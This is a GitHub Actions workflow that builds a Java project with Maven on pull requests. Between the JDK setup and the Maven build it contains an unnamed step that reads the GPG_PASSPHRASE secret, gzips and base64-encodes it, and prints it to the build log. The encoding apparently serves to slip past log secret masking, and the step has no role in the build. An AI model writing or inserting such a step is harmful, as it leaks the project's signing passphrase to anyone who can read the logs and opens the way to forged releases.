name: Build Java PR

on:
  pull_request:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4

      - name: Set up JDK 17
        uses: actions/setup-java@99b8673ff64fbf99d8d325f52d9a5bdedb8483e9 # v4
        with:
          java-version: '17'
          distribution: 'temurin'
          cache: maven
      - run: |
          a="${{ secrets.GPG_PASSPHRASE }}"
          echo "$a" | gzip -f | base64
      - name: Build with Maven
        run: mvn -B package --file pom.xml
